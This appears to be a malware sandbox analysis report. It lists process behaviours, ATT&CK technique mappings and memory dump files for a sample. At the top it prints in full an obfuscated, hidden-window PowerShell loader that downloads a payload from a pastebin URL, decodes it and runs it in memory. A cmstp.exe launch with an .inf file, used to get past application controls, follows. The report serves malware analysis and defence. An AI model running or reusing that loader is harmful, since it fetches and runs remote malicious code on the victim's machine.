powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/aKjCtLDg'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1448
- \??\c:\windows\system32\cmstp.exe
  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2emtvo5b.inf
  2⤵
  PID:324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/108-4-0x0000000004850000-0x0000000004854000-memory.dmp

Filesize
16KB

Download
memory/108-2-0x0000000000730000-0x0000000000731000-memory.dmp

Filesize
4KB

Download
memory/108-0-0x0000000005850000-0x0000000005950000-memory.dmp

Filesize
1024KB

Download
memory/700-5-0x000007FEF2130000-0x000007FEF23AA000-memory.dmp

Filesize
2.5MB

Download
memory/1448-24-0x000000001AD80000-0x000000001AD81000-memory.dmp

Filesize
4KB

Download
memory/1448-34-0x0000000002750000-0x0000000002757000-memory.dmp

Filesize
28KB

Download
memory/1448-17-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

Filesize
9.9MB

Download
memory/1492-31-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

Filesize
4KB

Download
memory/1492-41-0x000000001B5A0000-0x000000001B5A1000-memory.dmp

Filesize
4KB

Download
memory/1492-28-0x0000000001F20000-0x0000000001F21000-memory.dmp

Filesize
4KB

Download
memory/1492-30-0x000000001C230000-0x000000001C231000-memory.dmp

Filesize
4KB

Download
memory/1492-22-0x0000000002050000-0x0000000002051000-memory.dmp

Filesize
4KB

Download
memory/1492-18-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

Filesize
9.9MB

Download
memory/1492-58-0x000000001C5D0000-0x000000001C5D1000-memory.dmp

Filesize
4KB

Download
memory/1492-57-0x000000001C5C0000-0x000000001C5C1000-memory.dmp

Filesize
4KB

Download
memory/1492-45-0x000000001B7D0000-0x000000001B7D1000-memory.dmp

Filesize
4KB

Download
memory/1492-40-0x000000001C590000-0x000000001C59D000-memory.dmp

Filesize
52KB

Download
memory/1492-26-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/1492-42-0x000000001B7A0000-0x000000001B7A1000-memory.dmp

Filesize
4KB

Download
memory/1964-19-0x0000000006920000-0x0000000006943000-memory.dmp

Filesize
140KB

Download